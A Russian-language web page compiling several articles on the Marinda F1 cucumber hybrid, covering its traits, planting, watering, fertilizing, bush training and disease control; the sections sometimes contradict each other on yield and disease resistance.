1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта огурцов маринда

Описание сорта огурцов Маринда

Сорт огурцов Маринда пользуется особой популярностью не только на отечественном рынке, но и на мировом. Как только он появился, сразу же заполучил первые места всех возможных выставок. Появился он довольно давно, поэтому заслуженно занимает почетные места в огородах дачников и фермеров.

Описание сорта огурцов Маринда

Характеристика сорта

Появился сорт огурцов Маринда f1 в начале 21 века. Компанией, которая занималась разработкой этого гибрида, стала Монсанто. Селекционеры постарались на славу и создали первый в своем роде самоопыляемый вид.

Его можно выращивать, как в закрытых помещениях, типа теплицы, так в открытом грунте. Свои основные характеристики он не теряет, вне зависимости от места произрастания. Характеризуется высокими показателями урожайности и товарного вида.

Огурец Маринда f1 созревает за среднее количество времени, которое составляет 40-55 дней с момента высаживания в почву. Описание говорит о том, что плетение этого сорта умеренное. Цветение происходит только женского типа. Завязи формируются пучками.

Как только вы решили сажать рассаду в почву, можете смело отсчитывать 55 дней. Спустя это время можно приступать к обильному сбору урожая огурцов. Они не только отличаются приятными вкусовыми качествами, но и хорошим товарным видов, что позволяет быстро продавать их по выгодной цене. Этот гибридный огурчик очень редко подвергается воздействию заболеваний и вредителей.

Описание растения

Куст имеет достаточно мощную структуру. Каждый узел способен сформировать до 7 узлов. Листья у растения отличаются ярко-зеленым цветом.

Описание плода

Форма плода напоминает ровный цилиндр. На поверхности образовываются крупные пупырышки, которые обладают небольшим светлым оттенком. Сама поверхность кожуры темного зеленого оттенка. Мякоть характеризуется высокими вкусовыми качествами, высокой плотностью, без горечи.

Длина отдельного плода составляет 8-10 см. А вот вес достигает отметки в 80 г. Описание и характеристика показывают, что этот сорт имеет высокие показатели урожайности огурцов, которые составляют около 30 с 1м2.

Универсальные плоды в применении. За счет своей плотной структуры, они очень сильно хрустят, что привлекает внимание многих людей. Их употребляют не только в свежем виде, но и в качестве консервации. Очень часто корнишоны этих плодов заливают рассолом, и дают настояться. В этот момент все вкусовые качества проявляются намного сильнее.

Достоинства

Этот тип огурцов не требует опыления с помощью пчел. Помимо этого, можно выделить следующие уникальные характеристики разновидности:

  • вне зависимости от того, какие имеются погодные и уходовые условия, урожай всегда высокий;
  • большое количество завязей, образующихся в одном узле;
  • высокие показатели вкуса и товарного качества;
  • растет растение открытым типом, что только улучшает уборку урожая и проведение уходовых мероприятий;
  • не подвергается болезням и вирусам.

Растение обладает массой положительных характеристик

Недостатков в этом сорте не обнаружено.

Принцип выращивания

Характеристика этой разновидности позволяет высаживать не только рассаду в открытый грунт, но и семена. Посадка проводится обычным методом. Семена огурцов Маринда f1 следует высаживать на глубину не менее 4 см. Между рядами должно сохраняться расстояние в 50 см, а между лунками оно должно составлять 30 см. Лучше всего грядки накрывать специальной пленкой, чтобы огурцы Маринда ф1 не перемерзали во время ночного снижение температуры воздуха. Если условия будут хорошими, то всходить семена начнут через неделю.

Для того, чтобы сажать рассаду в грунт, ее следует для начала вырастить. Для этого высаживать следует семена в контейнеры, которые хранятся в теплом помещении, с теплым воздухом и средним уровнем влажности. Буквально через месяц, рассада будет пригодна для высаживания в открытый грунт.

До тех пор, пока рассада не была высажена на грядки, ее следует тщательно поливать и регулярно подкармливать. Подкормки могут быть от 2 до 4. Если вы заметили, что рассада нуждается в дополнительном свете, то нужно ставить специальные лампы и направлять на нее.

Почву следует выбирать такую, которая содержит в себе высокую концентрацию полезных веществ и подлежать качественной аэрации. Такие условия создаются за счет того, что в почву вносятся опилки из дерева или гниющая листва. Посадка проводится не раньше начальных чисел июня только в том случае, если грунт еще не прогрелся. Если климатические условия позволяют, что высаживать можно уже в конечных числах мая. При посадке в открытом грунте должно сохраняться расстояние между рядами в 100 см, а вот между лунками оно составляет 70 см.

Правила ухода

Лучше всего, чтобы почва для высаживания рассады или семян имела в себе специальные дренажи, которые будут проводить воздух и влагу. Очень важно, чтобы в ней не содержалась высокая концентрация азота. Это может негативно сказаться на конечном результате. Идеально, если в земле будет иметься большое количество гумуса, и она окажется прогретой.

Полив лучше проводить в вечернее время суток и только теплой водой. Он осуществляется раз в 2-3 дня. Каждые 10 дней следует проводить подкормки земли и растения. Положительно на конечном результате сказываются органические удобрения, которые состоят из птичьего или коровьего перегноя или же мочевина, разведенная в равных пропорциях с водой. Формировать нужно только 1 стебель у растения и убирать боковые пасынки.

Профилактика

Огурцы Маринда f1 обладают высоким иммунитетом и не подвергаются воздействию болезней или вирусов. Грибковые инфекции также не распространяются на этот тип огурцов. Создатели позаботились о простоте ухода за этими овощными растениями. Но, не стоит забывать о стандартных профилактических мероприятиях.

Огурцы Маринда: отзывы, фото, описание

Среди обилия огуречных сортов каждый огородник выбирает любимый, который высаживает постоянно. И чаще всего – это ранние сорта, которые позволяют уже с начала лета наслаждаться вкусными и хрустящими овощами.

Описание сорта

Раннеспелый гибрид Маринда отлично растет и плодоносит как в открытом грунте, так и в тепличных конструкциях, отличается средней плетистостью. Выращивать овощ можно горизонтальным способом или вертикальным. Для завязывания плодов Маринда F1 не требуется опыления. При правильном уходе в каждом узле завязывается по 5-7 плодов. Период от прорастания семян до появления первых огурцов составляет приблизительно полтора месяца.

Темно-зеленые огурцы гибридного сорта Маринда вырастают цилиндрической формы, длиной 8-11 см, массой 60-70 г. На поверхности плодов имеются крупные бугорки с небольшими белыми шипами (фото).

Хрустящая мякоть плотной структуры имеет маленькие семенные камеры и не горчит. Сорт Маринда F1 можно отнести к универсальным. Огурцы вкусны в свежем виде и хорошо подходят для консервации.

Урожайность сорта – 25-30 кг с квадратного метра площади. Огурцы гибридного сорта Маринда устойчивы ко многим заболеваниям (мучнистая роса, пятнистость листьев, кладоспориоз, парша, мозаика).

Выращивание рассады

Высаживают семена в последних числах апреля-начале мая. Чтобы принять в расчет климатические особенности региона, рекомендуется заняться посадкой зерен за 3-3,5 недели до момента пересаживания рассады в открытый грунт. Для огурцов этого гибридного сорта желательно самостоятельно подготовить грунт. Необходимо взять поровну торфа, садовой земли и песка. Гранулированные семена Маринда F1 от производителей имеют специальный тонкий слой, содержащий набор питательных элементов, противогрибковые/антимикробные препараты. Поэтому такие зерна можно сеять сразу в открытый грунт.

  1. Отдельные контейнеры заполняют питательным почвенным составом и слегка увлажняют. В пластиковых стаканчиках обязательно делают отверстия в дне. Если использовать один большой ящик, то в результате последующей пикировки ростки могут долго приживаться.
  2. В почве делают ямки (1,5-2 см), куда кладут сразу по 2 зерна Маринды F1. Посадочный материал присыпают землей.
  3. Емкости накрывают пленкой или стеклом и ставят в теплое место. Обычно спустя 3-4 дня уже появляются первые всходы гибридных огурцов Маринда. Покрытие с контейнеров убирают и переносят сеянцы в хорошо освещаемое место.
  4. После появления первых листиков, рассаду прореживают – из двух ростков оставляют сильный. Чтобы не повредить корневую систему оставшегося сеянца, слабый росток просто срезается или аккуратно отщипывается.

Если соблюдать правильные световой и температурный режимы, то рассада гибридных огурцов Маринда будет крепкой и здоровой. Подходящие условия: температура +15-18˚ С, яркий дневной свет. Но не следует ставить рассаду под прямые солнечные лучи. В пасмурную погоду рекомендуется использовать фитолампы днем и ночью.

Примерно за неделю-полторы до высаживания рассады в открытую почву, ее начинают закаливать. Для этого огурцы гибридного сорта Маринда выносят на улицу (время «прогулки» ежедневно постепенно увеличивают).

Уход за огурцами

Для огуречной грядки выделяются участки хорошо освещенные, защищенные от холодных ветров и сквозняков. Лучше всего гибрид Маринда растет на питательных, хорошо дренированных почвах, с невысоким содержанием азота.

Рассада с 3-4 листиками считается достаточно окрепшей, ее возможно высаживать в открытый грунт (ближе к концу мая-началу июня). Производители рекомендуют ориентироваться на температуру почвы – грунт должен прогреться до + 15-18˚ С. Если сеянцы передержать, то листва может начать желтеть.

Грядки под огурцы гибридного сорта Маринда готовят заранее: выкапывают неглубокие траншеи, в которые засыпается немного компоста, перепревшего навоза. При высаживании рассады рекомендуется придерживаться схемы: в ряду расстояние между ростками 30 см, а междурядье делают шириной 50-70 см. После посадки землю вокруг корней аккуратно уплотняют и поливают.

Правила полива

Для увлажнения грунта используется только теплая вода. В течение сезона огурцы Маринда F1 поливаются по-разному:

  • до начала цветения и при условии жаркой погоды, рекомендуется ежедневно поливать огуречные грядки. Желательно под каждый куст выливать пол литра – литр воды (4-5 л на квадратный метр);
  • при формировании завязи огурцов гибридного сорта Маринда и во время уборки урожая частоту поливов сокращают, но при этом увеличивают объем воды. Раз в два-три дня выливают воды в расчете 8-12 л на квадратный метр;
  • уже с середины августа сокращается обильность полива и частота. Достаточно раз в неделю вылить 3-4 л на квадратный метр (или 0,5-0,7 л под каждый куст).

Воду под огурцы гибридного сорта Маринда надо лить слабой струей, чтобы не разрушить корневую систему, расположенную неглубоко. Полив по листьям можно делать только в вечернее время (когда спадет дневная жара, но температура не очень понизится).

Удобрение почвы

Своевременное внесение удобрений обеспечит здоровый рост огурцов гибридного сорта Маринда и обильное плодоношение. Подкормку вносят двумя способами: прикорневой и внекорневой.

Первую подкормку огурца гибридного сорта Маринда в открытом грунте проводят в период наращивания зеленой массы. Но не стоит это делать бездумно. Если растение было высажено в удобренную почву и хорошо развивается, то не рекомендуется использовать удобрения. Если же сеянцы тонкие и слабые, то применяют комплексные составы: аммофоску (1 ст. л) разводят в 10 л воды. Поклонники органических удобрений могут использовать раствор птичьего помета (1 часть удобрения и 20 частей воды).

Во время цветения огурцов гибридного сорта Маринда останавливается рост листвы и стеблей и поэтому применяется смесь минеральных удобрений: на 10 л воды берут калийную селитру (20 г), стакан золы, аммиачную селитру (30 г), суперфосфат (40 г).

Чтобы увеличивать образование и рост завязей огурцов Маринда F1, используют раствор: на 10 л воды берут калийную селитру (25 г), мочевину (50 г), стакан золы. Продлить плодоношение в конце сезона (последние числа августа начало сентября) поможет внекорневая подкормка: зеленую массу обрызгивают раствором мочевины (15 г на 10 л воды).

При внекорневой подкормке важно правильно выбрать время: рано утром или вечером. Если после процедуры пройдет дождь, то рекомендуется опрыскивание повторить.

Рекомендации по выращиванию

При высаживании огурцов Маринда F1 в теплицах, обязательно устанавливаются шпалеры, так как стебли располагают вертикально. Столбы высотой 1,5-2 м располагают вдоль грядок. Подвязывать огурцы начинают через неделю после высаживания рассады. При формировании куста огурца Маринда F1 оставляют один стебель, который прищипывают, как только он дорастет до верха шпалеры. Как правило, в пазухах первых трех листов удаляются побеги и цветы.

Огурцы гибридного сорта Маринда, высаженные в открытом грунте, не рекомендуют прищипывать – чтобы не травмировать растение. Однако если у растения выросло 6-8 листьев, а боковых побегов не образовалось, то верхушку можно прищипнуть.

Выращивание огурцов вертикальным способом требует больше внимания и опыта. Поэтому огуречные грядки в открытом грунте – оптимальный вариант для начинающих огородников получить отличный урожай гибридных огурцов Маринда.

Огурец «Маринда F1» – народный выбор

Огурец «Маринда F1» – один из популярных сортов среди садоводов и огородников. Он привлекает своей гигантской урожайностью и отличным вкусом. Разработан голландскими селекционерами фирмы Monsanto. В 1994 году включен в Государственный реестр семян РФ, то есть на рынке уже более 20 лет. Хорошо прижился гибридный огурец и в России, рекомендован к выращиванию в Центральном и Центрально-Черноземном регионах. Согласно описанию сорта и отзывам, «Маринда F1» подходит для культивирования в теплице и в условиях открытого грунта.

Описание сорта

Данный гибрид огурца опыляется без помощи пчел (партенокарпический сорт). Характеризуется ранним сроком созревания плодов, высокой урожайностью и хорошей всхожестью, поэтому так полюбился многим огородникам. Является наилучшим выбором для выращивания на приусадебных участках и небольших фермах.

Плоды корнишонного типа, цилиндрической формы с частыми крупными бугорками и белыми шипами (см. фото). Вырастают длиной до 10 см, массой до 80 г, диаметром 2-3 см. Мякоть огурцов сочная и плотная, семечки не крупные, кожура тонкая. Имеют яркий свежий аромат, не горчат и не вяжут. Все эти характеристики позволяют применять огурцы «Маринда F1» в соленьях и летних салатах. С легкостью переносят перевозки и имеют длительный срок хранения.

Данный сорт огурцов устойчив к следующим болезням: пятнистая мозаика, парша, оливковая пятнистость, кладоспориоз.

Растение женского типа цветения, не крупное и не сильноплетистое, что облегчает сбор урожая. Пучковый тип завязи, в узле образуется около 7-8 плодов. Листва некрупная, светло-зеленого цвета.

Вегетационный период составляет 40-55 дней. Производительность кустов – 30 кг с 1 кв. м.

Положительные качества огурцов «Маринда»:

  • раннеспелые;
  • хороший товарный вид;
  • высокоурожайные;
  • универсальные в использовании и выращивании;
  • неприхотливые в уходе;
  • быстро адаптируются к климатическим условиям;
  • болезнестойкие.

Сорт огурцов «Маринда» имеет и недостатки:

  • восприимчивость к антракнозу, периноспориозу, угловатой пятнистости;
  • вовремя не сорванные плоды склонны к перерастанию;
  • подвержен нападению насекомых.

Выращивание

Для эксплантации «Маринды» желательно выбирать рыхлую и плодородную землю с минимальным содержанием азота. Участок должен быть солнечным, защищенным от ветра, с высоким содержанием гумуса. Место для посадки желательно менять один раз в три года.

Семена огурцов сорта «Маринда» обладают хорошей всхожестью, но их рекомендуется заранее отобрать и подготовить к посадке. Для этого их помещают в солевой раствор (1ст.л/1л воды) и оставляют на 15 минут. Всплывшие – не пригодны для культивации, оставшиеся следует промыть под проточной водой и хорошенько высушить. После этого можно приступать к посадке семян (возможно, заранее их прорастив на влажной тряпке в тепле).

Для лучшей всхожести выбирайте семена огурцов возрастом от 2 лет.

Для выращивания подходит рассадный способ и прямой посев семян в открытый грунт. В первом случае высадку производят в марте-мае. Для посадки выбирают специальную тару (можно использовать торфяные горшочки или таблетки), предварительно увлажняют почву, делают лунки глубиной 1-2 см и помещают туда семечки. На ранних этапах соблюдают температурный режим (28 градусов) и накрывают полиэтиленовой пленкой. Через месяц, когда у рассады огурцов появляются 2-3 настоящих листочка, ее высаживают в грунт, придерживаясь схемы 50х30 см, и заранее удобряют перегноем или навозом.

Второй вариант пригоден для теплиц и южных регионов нашей страны. Земля должна прогреться до 15-18С и обладать достаточным уровнем влажности. Семена замачивают в растворе воды, активированного угля и янтарной кислоты (по 1 таблетке на 200 мл воды). Схема высадки огурцов – 50х30 см, глубина – 3-4 см. После того, как всходы окрепнут, можно приступать к стандартному уходу за культурой.

Огурец «Маринда F1» прост в уходе и не доставит много хлопот садоводам:

  1. Полив осуществлять один раз в день в вечернее время. Земля должна быть влажной, но не слишком переувлажненной. Орошать теплой и отстоявшейся водой.
  2. Подкормка удобрениями до 5 раз за сезон. Это могут быть органические или минеральные средства. Первая подкормка производится не ранее 15 дней после пересадки огурцов в открытый грунт.
  3. Формировать кусты в один стебель. Для удобства использовать шпалерный способ выращивания. После 15 дней основной стебель подвязывают к шпалере. Боковые побеги прищипывают после второго/четвертого листа для лучшего ветвления и большего урожая.
  4. Рыхление почвы и прополку сорняков осуществлять только после полива. Для облегчения ухода можно замульчировать почву.
  5. Для борьбы с вредителями опрыскивать листву и стебли огурцов специальными препаратами по мере необходимости. От слизней используется метальдегид 5%, от клещей – дисперсная сера, от бахчевой тли – смесь из 10 г красного перца + 200 г табачной пыли +10 л воды температурой 60С.
  6. Для увеличения урожая осуществлять сбор плодов 1 раз в три дня. Раннее утро или вечер – самое лучшее время для сбора урожая. Огурцы срезают ножом или ножницами, сохраняя плодоножку.

Огурец Маринда

Огурец Маринда – партенокарпический, раннеспелый гибрид, выращенный голландскими селекционерами, но чтобы не ошибиться в выборе, необходимо перед покупкой семян прочитать описание и отзывы об огурцах Маринда F1. Популярность у садоводов гибрид получил за неприхотливость, высокую урожайность, хороший внешний вид и за высокие вкусовые качества.

Описание сорта огурцов Маринда F1

Огурец Маринда F1 – раннеспелый, неприхотливый гибрид. Сбор урожая происходит через месяц после прорастания семян. Огуречная культура образует мощный, малоплетистый куст с женским типом цветения. Для завязывания зеленцов сорту опылители не нужны. При регулярном уходе в каждом узле появляется по 5-7 огурцов.

Огурец Маринда F1 – высокоурожайный гибрид, с 1 кв. м снимают до 3 ведер урожая. Плоды можно применять в свежих салатах, использовать для засолки и приготовления салатов на зиму.

Благодаря иммунитету к заболеваниям и неустойчивым климатическим условиям, забота за огурцами Маринда сводится до минимума.

Вкусовые качества

Гибрид Маринда F1 образует темно-оливковые, крупнобугорчатые огурцы, массой до 70 г. Цилиндрические плоды, длиной 10 см, имеют плотную ароматную, негорькую мякоть с характерным огуречным хрустом.

Плюсы и минусы сорта Маринда F1

Огурцы Маринда, как и любой гибрид, имеют свои положительные и отрицательные качества. По отзывам садоводов, у сорта огурцов Маринда F1 есть много плюсов:

  • раннеспелый;
  • самоопыляющийся;
  • образует по 7 корнишонов в одном узле;
  • высокий и стабильный урожай;
  • универсальное применение;
  • приспособленность ко всем климатическим условиям;
  • иммунитет к заболеваниям.

Многие огородники нашли в огурце Маринде небольшой минус – сорт быстро перерастает, поэтому необходим своевременный сбор урожая.

Чтобы не ошибиться в выборе, недостаточно знать достоинства и недостатки, нужно ознакомиться с описанием и фото сорта огурцов Маринда F1.

Оптимальные условия выращивания

Для получения хорошего урожая огурцы Маринда F1 высаживают на легкую, плодородную почву, с низким содержанием азота. Грядки располагают на солнечном, хорошо защищенном от сквозняков участке. Чтобы повысить урожайность, при перекопке в грунт можно внести опилки или перепревший компост.

Наилучшая температура для роста и развития – 22-26 градусов. При температурных показателях ниже 14 и выше 40 градусов огурец Маринда останавливается в росте, скидывает завязи, что значительно влияет на урожайность.

Выращивание огурцов Маринда F1

Гибрид Маринда F1 – неприхотливая культура. Но для получения долгожданного результата, необходимо соблюдать правила выращивания и ухода. Огурцы можно выращивать на открытой и закрытой грядке, через рассаду и непосредственно семенами, высаженными на подготовленное место.

Прямая посадка в открытый грунт

Большинство дачников привыкли разводить огурцы через рассаду, но при выращивании в регионах с теплым климатом можно посеять семена непосредственно в открытый грунт.

На открытые грядки огурцы Маринда высеивают в несколько этапов. Этот метод позволит увеличить срок плодоношения и застраховаться от внезапно вернувшихся заморозков. Посев проводят с середины мая по начало июня, после прогревания почвы.

Для лучшей всхожести перед посевом подготавливают посадочный материал. Для этого его 2 часа прогревают при температуре +60 градусов, а потом замачивают на ночь в растворе:

  • марганцовка – 2 г;
  • калийная селитра – 1 ч. л.;
  • суперфосфат – 5 г;
  • вода – 1 л.

На подготовленной грядке делают борозды глубиной 2 см, с интервалом полметра. Просушенные семена огурцов Маринды помещают в ряды на расстоянии 4 см друг от друга, засыпают рыхлой землей, перегноем или торфом. Если грунт сухой, перед посевом его обильно проливают. При благоприятных условиях всходы огурцов появляются на 5-7 день.

Выращивание рассадным способом

Посадка огурцов Маринда через рассаду дает возможность снять первый урожай на 3-5 дней раньше. Чтобы вырастить здоровую и крепкую рассаду, необходимо:

  1. Обработать посевной материал и подготовить земляной субстрат.
  2. Питательный грунт для огурцов Маринда можно приобрести в магазине, а можно смешать самостоятельно.
  3. Для этого в опилки добавляют 20 г аммиачной селитры и выдерживают не менее 2 суток. После чего добавляют торф и 10 г калия.
  4. Все перемешивают и оставляют на 2 недели, за это время земля равномерно обогатится минеральными удобрениями. Торф и опилки берут в соотношении 7:3.
  5. Приготовленным субстратом наполняют торфяные стаканчики, после чего проливают.
  6. Подготовленные семена огурцов заглубляют во влажный грунт на 1 см и присыпают питательной землей.
  7. Емкости накрывают стеклом или полиэтиленом для создания парникового эффекта и убирают в теплое, светлое место. После появления ростков укрытие убирают.
  8. За неделю до высадки на постоянное место огурцы Маринда закаливают.
  9. Для этого емкость с рассадой выносят на свежий воздух, с каждым днем увеличивая время пребывания. За сутки до посадки рассаду обильно проливают.
  10. Пересадку огурцов Маринда проводят в солнечный день, когда на растении сформируются 3-4 листа. В открытый грунт – при стабильной температуре + 20 градусов, в парник – в середине или конце мая.
  11. Так как сорт образует мощный куст, расстояние между огуречной рассадой должно быть не менее 30 см.

Высаженные огурцы проливают, мульчируют и подвязывают к шпалере. Уход за огурцами Маринда несложный. Заключается в обильном поливе, подкормке, рыхлении почвы и формировании куста.

Полив и подкормка

Орошение огурцов проводят в пасмурную погоду или после захода солнца исключительно отстоянной, теплой водой. В течение сезона гибрид Маринда F1 поливают следующим образом:

  • до начала формирования цветочных завязей. В жаркую погоду проводят ежедневный полив по 1 л на 1 растение;
  • в процессе завязывания зеленцов частоту полива уменьшают, но объем увеличивают. На кв. м расходуют по ведру воды;
  • с середины августа полив сокращают. Достаточно проливать под куст по пол-литра воды.

Полив делают струйный, стараясь не размыть корневую систему. Дождевание можно проводить только в вечернее время, когда спадет жара и сядет солнце.

Если погода стоит пасмурная и дождливая, полив сокращают. Иначе жидкость начнет застаиваться, что может привести к загниванию корней и гибели растения.

Огурцы Маринда F1 хорошо растут на плодородной почве. Для сбора щедрого урожая огуречные кусты нуждаются в регулярных подкормках.

  1. Первую вносят для наращивания зеленной массы, но если огурцы посажены в плодородный грунт, то удобрения не вносят. Нехватку питательных веществ можно обнаружить по внешнему виду рассады. Если она тонкая, слабая и плохо развивается, то используют комплексные удобрения: в ведре теплой воды разводят 20 г аммофоски и тщательно перемешивают до полного растворения гранул. Также можно использовать органику, для этого разводят 1 часть навоза с 20 частями воды.
  2. Вторую – во время цветения. Для этого используют минеральную смесь: на ведро воды добавляют 20 г калийной селитры, 250 г золы, 30 г аммиачной селитры и 40 г суперфосфата.
  3. Чтобы увеличить урожайность, эффективен такой раствор: на ведро воды добавляют 25 г калийной селитры, 50 г мочевины и ст. древесной золы.
  4. Продлить плодоношение огурцов поможет внекорневая подкормка, приготовленная из 10 л воды и 15 г мочевины.

Формирование

От правильной формировки куста зависит урожайность. Так как огурцы Маринда F1 – это партенокарпический сорт и зеленцы завязываются на главном стебле, то формировка куста необходима.

Пасынкование проводят, когда на растении появляются 5-6 листьев. Первые 4 листа, побеги из пазух, цветы и зеленцы необходимо удалить, чтобы все силы растение пустило на развитие главного стебля.

Правила формирования огурца Маринда:

  • после 6 листа оставляют боковые побеги длиной 20 см;
  • побеги с 9 по 12 лист прищипывают на высоте 40 см;
  • с 15-20 листа оставляют полуметровые побеги;
  • когда верхушка дойдет до максимальной длины, ее прищипывают или аккуратно перекидывают через шпалеру и направляют вниз.

Правильно сформированный куст будет тратить питательные вещества не на наращивание зеленной массы, а на цветение и формирование огурцов.

Чтобы правильно вырастить партенокарпический гибрид огурцов Маринда, необходимо ознакомиться с отзывами и просмотреть фото.

Болезни и вредители

Из описания видно, что огурец Маринда F1 имеет стойкий иммунитет ко многим болезням, таким как:

  • кладоспориоз;
  • мозаика;
  • парша;
  • пятнистость листьев.

Но при неправильном уходе, огурец Маринда может быть подвергнут нападению тли и присоединению следующих заболеваний:

  • Пероноспороз – обнаружить заболевание можно по листве. На ней появляются коричневые и желтые пятна. Без лечения листовая пластина начинает усыхать, поражается плеть, а огурцы становятся безвкусными и деформированными. Чтобы спасти растение, применяют опрыскивание препаратами: «Планриз», «Эфаль-альетт». Для предупреждения заболевания огурцы удобряют фосфорно-калийной подкормкой, проводят предпосевную обработку и соблюдают севооборот.
  • Антракноз – первые симптомы можно распознать еще в стадии рассады. Корневая шейка покрывается коричневыми пятнами, листовая пластина желтеет. Высадив больное растение, заболевание может быстро распространиться на соседние кусты, поражая зеленцы, листья и побеги. Вылечить растение можно, полив его под корень бордоской смесью или препаратом «Абига-Пик», разведенным строго по инструкции. Обработку проводят несколько раза в неделю. Также чтобы грибок не распространялся, удаляют и сжигают поврежденные листья и побеги.
  • Тля – появляется в июле-августе. Насекомое питается соком растения, что приводит к его гибели. При заражении листовая пластина скручивается, завязи начинают опадать. Чтобы избавиться от насекомого, куст опрыскивают настоем табачной пыли, чеснока или древесной золы.

Урожайность

Огурец Маринда F1 – высокоурожайный гибрид, при своевременном уходе с куста можно снять до 3 ведер урожая. Чтобы повысить урожайность, корнишоны снимают несколько раз в день. Собирать огурцы начинают на 50 день после появления ростков, в утренние или вечерние часы. Плоды отделяют от плодоножки острым инструментом, стараясь не повредить плети. Свежие огурцы долго не хранятся, поэтому при большом урожае лучше проводить своевременную засолку или консервацию.

Огурец сорта Маринда F1 — вкусный и урожайный

Сегодня огородникам предоставлен колоссальный выбор разнообразных сортов огурцов. Приобретая семена для посадки на своём приусадебном участке, нужно внимательно ознакомиться с характеристиками сорта. Если вам нужно неприхотливое и урожайное растение, пригодное для выращивания и в теплице, и в открытом грунте, обратите внимание на голландский гибрид Маринда F1.

Описание огурца сорта Маринда

Огурец Маринда получен в Голландии фирмой MONSANTO HOLLAND B. V. Представляет собой гибрид первого поколения, имеющий ранние сроки созревания. Предназначен для товарного выращивания благодаря своим высоким качествам и отличной урожайности, но может, конечно, возделываться и в любительских огородах для собственного потребления. В Государственном реестре Российской федерации Маринда состоит с 1994 года. Рекомендуется к выращиванию в областях Центрального и Центрально-Чернозёмного регионов.

Кусты средней мощности, очень плодовитые

Для образования завязи пчёлы не нужны, то есть сорт является партенокарпическим, что очень удобно при выращивании в теплице. Тем не менее Маринда может возделываться и в открытом грунте. При желании этот гибрид можно выращивать даже в домашних условиях.

Огурец Маринда хорошо переносит комнатные условия, так что его можно сажать в обычный цветочный горшок и выращивать дома

Растения не слишком крупные и не образуют большого количества плетей, что удобно при сборе урожая. Как и у многих других сортов у Маринды женский тип цветения. Плодоношение начинается через 40–55 дней после прорастания семян. Завязи образуются пучками, по 5–7 штук в каждом узле. Листья небольших размеров, окрашены в светло-зелёный цвет. Зеленцы цилиндрической формы относятся к корнишонному типу, имеют небольшую длину (до 10 см) и диаметр (2–3 см). Масса плода достигает 80 г (в среднем 65–75 г). Плотная, но тонкая, покрытая бугорками и шипами белого цвета кожица, прикрывает сочную, плотную мякоть. Семенные камеры имеют небольшие размеры. Как мякоть, так и кожура не имеют горечи, характеризуются приятным ароматом и сладковатым вкусом. Использовать огурцы можно и для засолки, и для приготовления салатов.

Зеленцы одномерные, небольших размеров, окрашены в тёмно-зелёный цвет

Достоинства и недостатки сорта

В отличие от некоторых других сортов Маринда обладает рядом достоинств:

  • хорошая всхожесть;
  • высокая урожайность растений (25–30 кг/м 2 );
  • раннее созревание урожая;
  • привлекательный внешний вид и хороший вкус;
  • неприхотливость к условиям выращивания;
  • хорошая переносимость транспортировки и хранения;
  • устойчивость к пятнистой мозаике, кладоспориозу, парше, оливковой пятнистости.

Кроме достоинств, Маринда обладает и недостатками:

  • сорт легко поражается антракнозом и угловатой пятнистостью;
  • если плоды не сорвать вовремя, они быстро перерастают (в отличие, например, от сорта Гуннар);
  • часто поражается вредителями.

Посадка и выращивание

Хотя у Маринды F1 очень хорошие показатели всхожести, нужно прежде всего тщательно подготовить семена — это залог обильного урожая.

Подготовка к посадке и посадка

В первую очередь нужно отбраковать недоразвитые семена. Для этого их заливают солёной водой (1,5 столовых ложки соли на 1 л воды), перемешивают и оставляют на 15–20 минут. Семена, плавающие на поверхности, нужно собрать и выбросить. Оставшиеся промывают чистой водой и сушат.

Семена огурца Маринда — видео

Обязательной операцией предпосадочной обработки семян является прогрев. Эту процедуру можно выполнять независимо от планируемого срока посадки. Температура прогрева должна составлять около +60 о С (температура батареи центрального отопления). Время прогрева выбирается в зависимости от «возраста» семян: семена прошлого года прогревают 2–3 часа, двухгодичной давности — 25–30 дней. Семена можно сложить в тканевый мешочек и поместить на батарею.

Наибольшей степенью прорастаемости обладают 2-летние семена.

Для улучшения прорастания и дальнейшего развития растений семена перед посадкой необходимо замочить на 14–16 часов. Можно замачивать в чистой воде (20 о С), но для повышения эффективности лучше воспользоваться раствором суперфосфата (10 г) и сернокислого калия (10 г) на 1 л воды. Также хорошие результаты даёт использование раствора активированного угля (5 таблеток) и янтарной кислоты (5 таблеток) в 1 л воды.

Для посадки семян Маринды следует выбрать участок с рыхлой и плодородной землёй, хорошо прогреваемый солнцем и защищённый от ветра. Желательно, чтобы почва была богата гумусом и не содержала больших количеств азота.

Более трёх лет подряд огурцы на одном месте сажать не следует.

Наибольшего успеха при выращивании огурцов можно добиться, когда они растут на супеси или суглинке с нейтральной (или слабощелочной, или слабокислой) реакцией. Почву нужно подготовить ещё с осени — убрать сорняки, глубоко (на 20–25 см) вскопать, удобрить навозом или перегноем (10 кг/м 2 ), опрыскать почву раствором медного купороса (20 г на ведро воды).

Не сажайте огурцы на тех участках, где прежде росли подобные им культуры — тыква, дыня, арбуз, кабачки. Наилучшими предшественниками для огурцов являются люцерна, клевер, горчица, капуста.

Непосредственно перед посадкой почву обрабатывают ещё раз: за 10–12 дней до посадки на каждый квадратный метр вносят 8–10 кг перегноя или торфа и 100 г древесной золы и перекапывют на глубину штыка лопаты. После удобрения грунт опрыскивают раствором марганцовки (3 л/м 2 ), приготовленным из 1 г марганцовокислого калия на ведро воды.

Для выращивания в открытом грунте нужно подготовить рассаду. Семена высевают во влажную почву в торфяные горшочки на глубину 1–2 см, по 2–3 штуки в одну лунку. Производят посев в марте-апреле. В первые несколько дней следует поддерживать температуру +26…+28 о С. Для этого следует прикрывать посевы плёнкой. Примерно через 25–30, при появлении у рассады 3–4 настоящих листьев, можно пересаживать растения на постоянное место. Накануне высадки рассаду необходимо полить. Глубина посадочных лунок должна быть 12–15 см. Расстояние между рядами 60–70 см, между растениями в ряду 40–50 см.

Подготовка рассады огурцов на видео

Можно, конечно, посеять семена сразу на грядку, но таким способом лучше пользоваться в южных областях или при выращивании в теплицах. Сеют семена в грунт только при достижении им температуры 15–18 о С. Посев производят на глубину 3–4 см, по 2–3 семечка в одну лунку (после появления всходов слабые ростки удаляют).

Уход за посадками

Огурцы Маринда не требуют особо сложного ухода.

Формируются растения в один стебель, который через две недели роста подвязывают к шпалере. Боковые побеги нужно прищипывать после 2–4 листочка.

Шпалера является самым удобным способом выращивания огурцов

Главным условием выращивания является поддержание постоянной, но не слишком сильной, влажности почвы. Для этого каждый день растения нужно поливать утром или вечером, используя для этого тёплую, отстоявшуюся воду. После каждого полива нужно рыхлить и пропалывать почву в междурядьях. Поверхность грунта рекомендуется замульчировать, чтобы брызги грязи во время полива не попадали на плоды и цветы.

